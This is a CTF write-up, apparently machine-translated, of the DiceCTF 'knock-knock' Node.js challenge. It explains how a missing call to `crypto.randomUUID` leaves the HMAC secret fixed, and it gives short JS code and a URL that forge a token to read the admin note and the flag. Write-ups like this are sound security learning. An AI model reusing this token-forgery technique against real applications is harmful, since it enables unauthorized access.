DiceCTF - knock-knock

Together nodejs subject , Given the source code and dockerfile, from dockerfile know nodejs Version is 17.4.0, One pastebin

Return can be xss, But it doesn't come back cookie, therefore , Audit the code

The code logic is simple flag stay notes[0] position , But because everyone returns token inequality , So I want to forge token Switch to id=0 It seems impossible

You can find token The main logic of generation depends on two parts

this.secret = `secret-${crypto.randomUUID}`;
 and 
return crypto.createHmac('sha256',this.secret).update(id.toString()).digest('hex');

When I want to use my nodejs14 Try to generate secret Exception found at

So I went to find it 17 Version of the online website , Found a loophole ,nodejs-online

randomUUID The lack of () Lead to this.secret For fixing , This is a forgery token The opportunity of

So it can be forged token

const crypto = require('crypto');
let secret = `secret-${crypto.randomUUID}`;
let id = 0;
console.log(crypto.createHmac('sha256', secret).update(id.toString()).digest('hex'));

Another manual method
Put the error message base64 code

console.log(btoa(`secret-${crypto.randomUUID}`));

Generate

c2VjcmV0LWZ1bmN0aW9uIHJhbmRvbVVVSUQob3B0aW9ucykgewogIGlmIChvcHRpb25zICE9PSB1bmRlZmluZWQpCiAgICB2YWxpZGF0ZU9iamVjdChvcHRpb25zLCAnb3B0aW9ucycpOwogIGNvbnN0IHsKICAgIGRpc2FibGVFbnRyb3B5Q2FjaGUgPSBmYWxzZSwKICB9ID0gb3B0aW9ucyB8fCB7fTsKCiAgdmFsaWRhdGVCb29sZWFuKGRpc2FibGVFbnRyb3B5Q2FjaGUsICdvcHRpb25zLmRpc2FibGVFbnRyb3B5Q2FjaGUnKTsKCiAgcmV0dXJuIGRpc2FibGVFbnRyb3B5Q2FjaGUgPyBnZXRVbmJ1ZmZlcmVkVVVJRCgpIDogZ2V0QnVmZmVyZWRVVUlEKCk7Cn0=

utilize hmac forge token

visit

url/note?id=0&token=7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264

FLAG：dice{1_d00r_y0u_d00r_w3_a11_d00r_f0r_1_d00r}